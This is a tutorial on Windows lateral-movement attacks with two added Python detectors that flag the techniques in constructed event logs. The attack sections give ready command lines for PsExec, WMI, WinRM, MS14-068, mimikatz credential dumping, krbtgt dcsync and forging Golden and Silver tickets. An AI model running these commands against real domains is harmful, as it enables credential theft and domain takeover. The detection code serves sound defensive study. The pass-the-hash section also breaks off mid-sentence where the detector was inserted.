After an attacker has used a jump host to push further into the intranet, they obtain privileges on the target system in various ways and then use the plaintext password or hash of a user to move laterally across the intranet.
The simplest way is to log in to the remote server with a plaintext password. Here we summarize the main ideas behind Windows lateral movement and the attacks used for it.
1. IPC connection
An IPC$ session is established with the target machine by authenticating with a user name and password. Once connected, the attacker can list shared resources on the remote host, upload and download files, create scheduled tasks, and so on.
net use \\<DC IP>\IPC$ "password" /user:"username"
2. PsExec
PsExec is a lightweight Telnet replacement that lets you execute processes on other systems, with full interactivity for console applications, without manually installing client software.
Download address:
https://docs.microsoft.com/zh-cn/sysinternals/downloads/psexec
Return an interactive shell:
PsExec.exe \\10.1.1.1 -u administrator -p abc123! cmd.exe
Metasploit also integrates a psexec module.
3. WMI
WMI (Windows Management Instrumentation) is a model for managing local and remote computers. It allows you to access, configure, manage, and monitor almost all Windows resources.
Remote process creation:
wmic /node:10.1.1.1 /user:administrator /password:abc123! process call create "cmd.exe /c ipconfig"
4. WinRM
WinRM is the Windows Remote Management service. By connecting remotely to the WinRM module you can operate the Windows command line. Since Windows Server 2012 the listening ports 5985 (HTTP) and 5986 (HTTPS) are enabled by default.
winrs -r:http://10.1.1.1:5985 -u:administrator -p:abc123! "whoami /all"
5. Pass the hash
By obtaining the hash of the target user, the attacker can use that hash to impersonate the user and obtain the user's access rights without knowing the plaintext password.
MSF provides the psexec module for pass-the-hash, which needs only the password hash to execute arbitrary commands:
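The techniques in sections 1 to 5 each leave a characteristic trace in Windows event logs on the source or target host. The following detector, added here as an example and not part of the original article, scans constructed sample event records for those traces: a 5140 IPC$ share access, a 7045 PSEXESVC service installation, 4688 process creations parented by WmiPrvSE.exe (WMI) or wsmprovhost.exe (WinRM), and a 4624 logon of type 9 through the seclogo logon process, which is what a pass-the-hash "runas /netonly"-style injection on the source host produces. The event IDs and field names are the real Windows ones; host names, addresses and accounts in the sample records are constructed.

```python
"""
Added example (not from the original article): scan constructed Windows
Security/System event records for the lateral-movement traces of sections 1-5.
Event IDs and EventData field names match Windows; the sample data is constructed.
"""
from collections import namedtuple

Finding = namedtuple("Finding", "technique host detail")

# Constructed sample records; each dict mimics the EventData fields of one event.
SAMPLE_EVENTS = [
    # 1. IPC$ session: 5140 "A network share object was accessed" on the target
    {"host": "dc01", "id": 5140, "ShareName": "\\\\*\\IPC$",
     "SubjectUserName": "administrator", "IpAddress": "10.1.1.50"},
    # 2. PsExec: the PSEXESVC service is installed on the target (System log 7045)
    {"host": "srv01", "id": 7045, "ServiceName": "PSEXESVC",
     "ImagePath": "%SystemRoot%\\PSEXESVC.exe"},
    # 3. WMI: a remote "process call create" spawns a child of WmiPrvSE.exe (4688)
    {"host": "srv01", "id": 4688, "NewProcessName": "C:\\Windows\\System32\\cmd.exe",
     "ParentProcessName": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
     "CommandLine": "cmd.exe /c ipconfig"},
    # 4. WinRM: winrs commands run under wsmprovhost.exe (4688)
    {"host": "srv01", "id": 4688, "NewProcessName": "C:\\Windows\\System32\\whoami.exe",
     "ParentProcessName": "C:\\Windows\\System32\\wsmprovhost.exe",
     "CommandLine": "whoami /all"},
    # 5. Pass-the-hash on the source host: 4624, logon type 9, logon process seclogo
    {"host": "ws01", "id": 4624, "LogonType": "9", "LogonProcessName": "seclogo",
     "AuthenticationPackageName": "Negotiate", "TargetUserName": "administrator"},
    # Benign interactive console logon; must not be flagged
    {"host": "ws01", "id": 4624, "LogonType": "2", "LogonProcessName": "User32",
     "AuthenticationPackageName": "Negotiate", "TargetUserName": "alice"},
]


def detect(events):
    """Return a Finding for every record that matches one of the five patterns."""
    findings = []
    for e in events:
        host, eid = e["host"], e["id"]
        if eid == 5140 and e.get("ShareName", "").upper().endswith("IPC$"):
            # IPC$ access alone is common and noisy; treat it as a weak signal
            # to correlate with the stronger ones below.
            findings.append(Finding("ipc_session", host,
                                    f"{e.get('SubjectUserName')} from {e.get('IpAddress')}"))
        elif eid == 7045 and "PSEXESVC" in e.get("ServiceName", "").upper():
            findings.append(Finding("psexec_service_install", host, e.get("ImagePath")))
        elif eid == 4688:
            parent = e.get("ParentProcessName", "").lower()
            if parent.endswith("wmiprvse.exe"):
                findings.append(Finding("wmi_remote_exec", host, e.get("CommandLine")))
            elif parent.endswith("wsmprovhost.exe"):
                findings.append(Finding("winrm_remote_exec", host, e.get("CommandLine")))
        elif (eid == 4624 and e.get("LogonType") == "9"
              and e.get("LogonProcessName", "").lower() == "seclogo"):
            findings.append(Finding("pass_the_hash_runas", host, e.get("TargetUserName")))
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"{f.host:6} {f.technique:24} {f.detail}")
```

In a real deployment the records would come from a SIEM or from `Get-WinEvent` exports rather than an inline list, and the PSEXESVC check should also cover renamed service names by matching on the `ImagePath` pattern, since the service name is attacker-controlled.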
6. Pass the ticket attack
After obtaining domain controller privileges, the attacker can export tickets from the domain controller's memory and use them to log in to the domain controller.
Attack flow:
Step 1: Export the tickets in memory using mimikatz
mimikatz# sekurlsa::tickets /export
Step 2: Select one of the exported ticket files and import it on an ordinary user's host.
Step 3: Obtain domain controller rights
7. MS14-068
MS14-068 is a privilege escalation vulnerability that lets an ordinary domain user elevate to domain controller privileges. The attacker constructs a specially crafted request to obtain the elevated permissions. To check exposure, verify whether patch KB3011780 is installed on the domain controller.
Attack flow:
Step 1: Forge a TGT using the MS14-068 tool
MS14-068.exe -u [email protected] -p abc123! -s S-1-5-21-735015318-3972860336-672499796 -d dc.test.com
Step 2: Use Mimikatz to load the TGT produced by the tool into memory and create a credential cache
mimikatz# kerberos::ptc [email protected]
Step 3: Obtain permissions
PsExec.exe \\dc cmd.exe
8. Golden Ticket
The principle of the Golden Ticket is to forge a TGT using the hash of the KRBTGT account. As long as a high-privilege TGT is held, it can be presented to the TGS in exchange for a service ticket (ST) for any service.
Step 1: Get the SID and hash of KRBTGT
The SID and hash of the KRBTGT account are obtained directly with a mimikatz command:
lsadump::dcsync /domain:test.com /user:krbtgt
Step 2: Forge the Golden Ticket
Forge the TGT using Mimikatz:
kerberos::golden /admin:administrator /domain:test.com /sid:S-1-5-21-735015318-3972860336-672499796 /krbtgt:dc717a226a07d0f6adbcd9c0337c6513 /ticket:golden.kiribi
Step 3: Obtain permissions
Clear the local ticket cache and import the forged Golden Ticket:
kerberos::list                 # check the tickets saved locally
kerberos::purge                # purge the local ticket cache
kerberos::ptt golden.kiribi    # import the forged Golden Ticket
kerberos::list                 # check the tickets saved locally again
Step 4: Use the forged Golden Ticket
Use psexec.exe directly to log in remotely and execute commands:
PsExec.exe \\dc cmd.exe
9. Silver Tickets
The principle of the Silver Ticket is to forge a Service Ticket (ST) directly, so that with the hash of the account the attacker obtains the specified access rights without going through the KDC.
Forged tickets are only valid for particular services. The following services can be used:
Service Type | Required Silver Tickets
---|---
WMI | HOST, RPCSS
PowerShell Remoting | HOST, HTTP
WinRM | HOST, HTTP
Scheduled Tasks | HOST
LDAP, DCSync | LDAP
Windows File Share (CIFS) | CIFS
Windows Remote Server Administration Tools | RPCSS, LDAP, CIFS
Step 1: Set up the scenario
Symptom: two hosts in the same domain receive "Access denied" when they try to access files on Win-Server through a file share.
Step 2: Obtain the NTLM hash
Log in to the Win-Server host and export the hash using Mimikatz:
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" > log.txt
Step 3: Forge the ticket
kerberos::golden /domain:test.com /sid:S-1-5-21-735015318-3972860336-672499796 /rc4:943434a10b5134c0b1ef5e8f1ef9b020 /user:test /service:cifs /target:win-server.test.com /ptt
Step 4: Access the shared file
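The three Kerberos ticket attacks above (sections 6, 8 and 9) differ in which KDC events they do and do not generate: a stolen ticket that is passed from another host produces service ticket requests (4769) from a client address that never obtained the TGT (4768); a forged Golden Ticket produces 4769 requests for which the KDC never issued a TGT at all; and a forged Silver Ticket produces a Kerberos network logon (4624) on the member server for which the domain controller never logged a 4769. The following correlation checks, added here as an example and not part of the original article, implement those three comparisons over constructed sample events. The event IDs and field names are the real Windows ones; account names, host names and addresses are constructed.

```python
"""
Added example (not from the original article): correlate constructed domain
controller events (4768 TGT requested, 4769 service ticket requested) with a
member server's 4624 Kerberos logons to spot pass-the-ticket, Golden Ticket
and Silver Ticket use. All sample records are constructed.
"""
from collections import defaultdict

# Constructed domain controller events, in the order they were logged.
DC_EVENTS = [
    # Normal: alice gets a TGT and then a service ticket, both from 10.1.1.50
    {"id": 4768, "TargetUserName": "alice", "IpAddress": "10.1.1.50"},
    {"id": 4769, "TargetUserName": "alice@TEST.COM", "ServiceName": "WIN-SERVER$",
     "IpAddress": "10.1.1.50"},
    # Pass-the-ticket: bob's TGT was issued to 10.1.1.51, but a service ticket is
    # requested with it from 10.1.1.99
    {"id": 4768, "TargetUserName": "bob", "IpAddress": "10.1.1.51"},
    {"id": 4769, "TargetUserName": "bob@TEST.COM", "ServiceName": "WIN-SERVER$",
     "IpAddress": "10.1.1.99"},
    # Golden Ticket: a service ticket request for which the KDC never issued a TGT
    {"id": 4769, "TargetUserName": "administrator@TEST.COM", "ServiceName": "DC$",
     "IpAddress": "10.1.1.99"},
]

# Constructed member server (win-server) events.
SERVER_EVENTS = [
    # Normal Kerberos network logon matching alice's 4769 above
    {"id": 4624, "LogonType": "3", "AuthenticationPackageName": "Kerberos",
     "TargetUserName": "alice", "IpAddress": "10.1.1.50"},
    # Silver Ticket: Kerberos logon as "test" with no 4769 for that user on the DC
    {"id": 4624, "LogonType": "3", "AuthenticationPackageName": "Kerberos",
     "TargetUserName": "test", "IpAddress": "10.1.1.99"},
]


def strip_realm(name):
    """4769 records the user as user@REALM while 4768 and 4624 do not; normalise."""
    return name.split("@")[0].lower()


def check_tgs_against_tgt(dc_events):
    """Every 4769 should follow a 4768 for the same user from the same client.
    No TGT at all points to a forged TGT (Golden Ticket); a TGT issued to a
    different client points to a stolen ticket being passed from another host.
    A production version keys on a time window, since a TGT is valid for hours
    and its 4768 may fall outside the batch being examined."""
    tgt_clients = defaultdict(set)
    findings = []
    for e in dc_events:
        if e["id"] == 4768:
            tgt_clients[strip_realm(e["TargetUserName"])].add(e["IpAddress"])
        elif e["id"] == 4769:
            user = strip_realm(e["TargetUserName"])
            if user not in tgt_clients:
                findings.append(("tgs_without_tgt", user, e["IpAddress"]))
            elif e["IpAddress"] not in tgt_clients[user]:
                findings.append(("tgs_from_unexpected_client", user, e["IpAddress"]))
    return findings


def check_logons_against_tgs(dc_events, server_events):
    """A Kerberos network logon on a member server for which the KDC never
    issued a service ticket was presented a ticket the KDC did not make
    (Silver Ticket). A production version also matches the 4769 ServiceName
    against the server's own account and applies a time window."""
    tgs_users = {strip_realm(e["TargetUserName"]) for e in dc_events if e["id"] == 4769}
    return [("kerberos_logon_without_tgs", e["TargetUserName"].lower(), e["IpAddress"])
            for e in server_events
            if e["id"] == 4624 and e.get("LogonType") == "3"
            and e.get("AuthenticationPackageName") == "Kerberos"
            and e["TargetUserName"].lower() not in tgs_users]


if __name__ == "__main__":
    for finding in check_tgs_against_tgt(DC_EVENTS):
        print(finding)
    for finding in check_logons_against_tgs(DC_EVENTS, SERVER_EVENTS):
        print(finding)
```

Both checks depend on the domain controllers' Security logs being forwarded to the same place as the member servers' logs; without the DC side, the Silver Ticket comparison has nothing to correlate against, which is exactly why that attack is attractive to an attacker.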